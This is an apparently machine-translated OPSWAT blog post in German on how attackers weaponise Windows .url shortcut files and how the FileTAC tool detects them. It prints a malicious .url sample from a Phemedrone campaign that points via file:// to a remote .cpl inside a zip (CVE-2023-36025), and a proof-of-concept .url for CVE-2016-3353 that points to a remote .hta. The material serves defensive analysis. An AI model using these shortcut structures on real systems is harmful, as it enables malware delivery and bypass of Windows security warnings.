KI-gestützte Cyberangriffe: Wie man intelligente Bedrohungen erkennt, verhindert und abwehrt

Jetzt lesen
Wir verwenden künstliche Intelligenz für Website-Übersetzungen, und obwohl wir uns um Genauigkeit bemühen, kann es sein, dass sie nicht immer 100%ig präzise sind. Wir danken Ihnen für Ihr Verständnis.

Die Abkürzung zur Bosheit, Teil zwei: Statische Analyse von bösartigen URL-Dateien und die dahinter stehenden Tricks

Wie Angreifer die Struktur von URL-Dateien als Waffe einsetzen - und wie FileTAC sie aufdeckt, bevor sie ausgeführt werden.
von OPSWAT
Jetzt teilen

Da dateibasierte Angriffe immer modularer und ausweichender werden, sind es oft die einfachsten - und nicht die komplexesten - Dateien, die die verheerendsten Malware-Ketten auslösen. Die .url-Datei ist ein solches Beispiel. Obwohl sie strukturell minimal ist, werden URL-Dateien auf immer raffiniertere Weise missbraucht, was sie zu einem häufigen und unterschätzten Bedrohungsvektor macht. 

Dieser zweite Teil unserer dreiteiligen Serie über den Missbrauch von URL-Dateien konzentriert sich auf statische Methoden - wasAngreifer in URL-Dateien einbetten und wie Verteidiger Bedrohungen vor der Ausführung erkennen können. Wir untersuchen Indikatoren für eine Kompromittierung (IOCs), gängige Dateistrukturen und historische Missbrauchsmuster. In diesem Artikel wird auch gezeigt, wie FileTAC vonOPSWAT, eine Plattform zur tiefgreifenden statischen Prüfung, dabei hilft, Bedrohungen im Ruhezustand aufzudecken - bevor sie überhaupt detonieren.

URL-Dateien in bösartigen Kontexten

URL-Dateien sind in den letzten Jahren immer häufiger in Bedrohungskampagnen zu finden gewesen. Ein Anstieg der Aktivitäten im Oktober 2023, wie von Proofpoint berichtet, bestand darin, dass Bedrohungsakteure zunächst den DarkGate-Trojaner und später den NetSupport RAT an Opfer verteilten.  

Später, Mitte Januar, stellte Trend Micro eine aktive Kampagne fest, bei der eine Variante eines Trojaners namens Phemedrone zum Stehlen von Informationen an die Opfer verteilt wurde. In jedem dieser Fälle wurden mehrstufige Bedrohungssequenzen verwendet, und die Bedrohungsakteure integrierten URL-Dateien als Komponenten des Angriffs. 

Wie aus den Quellen hervorgeht, hatten die bei diesen Angriffen verbreiteten URL-Dateien einen bestimmten Zweck. Sie wurden unter Ausnutzung von CVE-2023-36025 verwendet, einer Schwachstelle in Windows, die eine Umgehung von SmartScreen ermöglichte - eine Defense Evasion durch Umgehung der Sicherheitskontrolle. Durch die Verwendung von manipulierten URL-Dateien können Angreifer eine Kette von Downloads bösartiger Dateien auslösen, ohne den Verdacht der Benutzer durch Warnmeldungen über nicht vertrauenswürdige Inhalte zu wecken. 

Um dies besser zu verstehen, sollten wir uns noch einmal das Beispiel der einfachen Internet-Verknüpfungsdatei ansehen:

[InternetShortcut]
opswat

Wie in der inoffiziellen Dokumentation vermerkt, ist das im URL-Wert verwendete Protokollpräfix nicht auf http oder https für ein Remote-Präfix beschränkt; es können verschiedene unterstützte Protokolle angegeben werden. Um ein Beispiel dafür zu sehen, können wir uns ein Beispiel aus der jüngsten Phemedrone-Verteilungskampagne ansehen: 69941417f26c207f7cbbbe36ce8b4d976640a3d7f407d316932428e427f1980b.

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9

[InternetShortcut]
IDList=
URL=file://51.79.185[.]145/pdf/data1.zip/pdf1.cpl
IconIndex=13
HotKey=0
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Diese bösartige URL-Datei verwendet ein Präfix file:// für den Pfad, was bemerkenswert ist und mit der Umgehung der Sicherheitskontrolle zusammenhängt. Lassen Sie uns die wichtigen Attribute dieser URL klären:

  • Das Präfix lautet file://, was in der Regel einen Verweis auf einen lokal zugänglichen Dateipfad angibt.
  • Der referenzierte Pfad befindet sich jedoch an einem Netzwerkstandort, einer entfernten (nicht vertrauenswürdigen) IP-Adresse.
  • Das Ziel des referenzierten Pfades ist eine .cpl-Datei oder ein Systemsteuerungs-Applet, das ein ausführbarer Dateityp ist.
  • Der Pfad zur .cpl-Datei in der URL befindet sich innerhalb eines ZIP-Archivs, ein ungewöhnliches Konstrukt, das von Windows unterstützt wird, damit der Explorer und andere Komponenten eine ZIP-Datei als Verzeichnisteil abstrahieren können.

Die Möglichkeit, eine Ausführungskette bösartiger Inhalte von einem direkt ausführbaren Dateityp wie einer .cpl (DLL)-Datei aus zu starten, ohne dass lästige Steuerelemente den Vorgang unterbrechen oder den Benutzer darauf hinweisen, ist für kriminelle Akteure sehr attraktiv.

Statische Analyse und die Rolle von FileTAC

Während viele der oben genannten Verhaltensweisen zur Laufzeit sichtbar werden, sind viele der verräterischen Anzeichen für Missbrauch - wie file:// Verwendung, Archiv-Traversal oder Pfadverschleierung - sind durch statische Inspektion nachweisbar. Dies ist der Punkt OPSWAT FileTAC übertrifft. FileTAC (File Triage, Analysis and Control) ist die Lösung von OPSWATfür die Durchführung fortschrittlicher Deep File Inspection (DFI) in großem Umfang, von jedem Ort im Netzwerk, über den E-Mail-Weg oder manuelle Dateiübertragungen.

FileTAC führt tiefgreifende statische Dateianalysen durch, ohne dass eine Ausführung erforderlich ist, und enthüllt:

  • Anomalien bei Protokollen und Metadaten
  • Verwendung von "IconFile", "WorkingDirectory" und anderen Feldern zur Verschleierung oder zur Seitwärtsbewegung
  • Rekursive Inhaltsanalyse (z. B. URL-Dateien in ZIP-, ISO- oder verschachtelten Formaten)
  • YARA-Signaturerkennungen für bekannte Kampagnen und Techniken
  • IOC-Korrelation mit RetroHunt®, Anwendung neuer Signaturen auf zuvor erfasste Dateidaten

Diese Funktion ermöglicht es Verteidigern, bösartige URL-Dateien zu markieren, bevor die Benutzer überhaupt einen Doppelklick ausführen. 

Die Analyse eines übereinstimmenden Dateimusters in FileTAC offenbart die folgenden Erkenntnisse, die Analysten bei der Analyse der Datei hilfreich sind:

Details zu hochgeladenen Dateien, einschließlich MIME-Typ-Erkennung, kryptografische Hashes und Bedrohungsbewertungen
Ansicht des Dateiinhalts, die sowohl eine Ansicht von Zeichenketten als auch eine hexadezimale Byte-Ansicht unterstützt
Datei-Ereignisse mit Erkennungen aus der Datei-Analyse und den sich daraus ergebenden Punktzahlen für den Tiefenkontext
Erweiterter Erkennungskontext mit Datei-Offsets und passenden Nutzdaten
Details zur Erkennungssignatur mit einer Beschreibung und Referenzen sowie Links zu den erkannten Dateien auf der Plattform

Historische Anwendungsfälle: Eine Zeitleiste der bewaffneten URL-Handwerkskunst

Es ist auch erwähnenswert, dass diese spezielle offensive Technik nicht auf die jüngsten Kampagnen oder die jüngste Schwachstelle zur Umgehung von Sicherheitsfunktionen beschränkt ist. Wenn wir einen Blick zurück werfen, sehen wir einen Zeitraum von mehreren Jahren, in dem verschiedene Aspekte im Zusammenhang mit dem Funktionsraum um URL-Dateien und der Ausnutzung der damit verbundenen Angriffsfläche deutlich werden.

CVE-2016-3353 - Umgehung der Internet Explorer-Sicherheitsfunktion Sicherheitslücke

Bereits 2016 tauchte eine andere Sicherheitslücke auf, die den Internet Explorer betraf und von Microsoft in MS16-104 behoben wurde. Das Advisory zu CVE-2016-3353 geht nicht weiter ins Detail, weist aber auf die Bedeutung von URL-Dateien im Ausnutzungsszenario hin: 

"In einem webbasierten Angriffsszenario könnte ein Angreifer eine bösartige Website hosten, die darauf ausgelegt ist, die Umgehung der Sicherheitsfunktion auszunutzen. Alternativ könnte der Angreifer in einem E-Mail- oder Instant-Messaging-Angriffsszenario dem Zielbenutzer eine speziell gestaltete .url-Datei senden, die darauf ausgelegt ist, die Umgehung auszunutzen." 

Diese Schwachstelle wurde später von Quarkslab analysiert, wobei deutlich wurde, dass die Art der Umgehung dieser Sicherheitsfunktion mit der Handhabung von .url-Dateien und der Einhaltung des Mark-of-the-Web (MOTW) zu tun hat, was sie in vertrautes Terrain mit dem Missbrauch anderer Funktionen und Oberflächen bringt, die für eine MOTW-Umgehung anfällig sind, wie z. B. missbrauchte Container-Dateiformate (IMG, ISO, VHD, VHDX usw.). 

Der Konzeptnachweis der Forscher zeigt auch eine bemerkenswerte Ähnlichkeit mit dem jüngeren Fall CVE-2023-36025:

[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9
[InternetShortcut]
IDList=
URL=file:///\\192.168.1[.]100\share\test.zip\ms16-104.hta

Die obige URL-Datei weist alle Merkmale auf, die wir zuvor für das waffenfähige Muster aus der jüngsten Malware-Verbreitung aufgezählt haben; die file:// Präfix, ein nicht vertrauenswürdiger Remote-Host, ein Ziel für den Inhalt einer ausführbaren Datei und sogar die Pfadangabe innerhalb eines ZIP-Archivs.

Der Vorteil der statischen Erkennung

Indem FileTAC diese bösartigen Muster im Ruhezustand abfängt - ohne dass eine Sandbox-Detonation erforderlich ist - verkürzt FileTAC die Erkennungszeit drastisch und bietet gleichzeitig:

  • Schnellere Behebung von infizierten E-Mails oder Endpunkt-Expositionen
  • Sichere Sichtung verdächtiger Inhalte ohne Offenlegung von Analysten oder Sandboxen
  • Retrohunting über historische Daten für Forensik und Bedrohungsjagd

Verknüpfte Dateien, ernste Bedrohungen

URL-Dateien sind nicht länger ein Relikt aus der Windows-Vergangenheit - sie sind zunehmend wichtige Werkzeuge im Malware-Bereitstellungsprozess und werden von mehreren Erstzugriffs-Brokern im kriminellen Untergrund genutzt. Durch strukturelle Manipulation und sorgfältige Ausnutzung des Systemverhaltens nutzen Bedrohungsakteure .url-Dateien, um Abwehrmechanismen zu umgehen und Nutzdaten der zweiten Stufe zu laden. 

Die statische Inspektion ist eine der effektivsten Methoden, um diese Bedrohungen frühzeitig zu erkennen, und FileTAC bietet die Präzision, die Tiefe und das kontextbezogene Bewusstsein, die dafür erforderlich sind. 

Im dritten Teil werden wir uns mit dem Verhalten befassen: Wir werden untersuchen, wie sich URL-Dateien zur Laufzeit verhalten, und wie MetaDefender Sandbox ihre Auswirkungen in der realen Welt durch dynamische Analyse und vollständige Systembeobachtung aufdeckt.

Bleiben Sie auf dem Laufenden mit OPSWAT!

Melden Sie sich noch heute an, um die neuesten Unternehmensinformationen zu erhalten, Geschichten, Veranstaltungshinweise und mehr.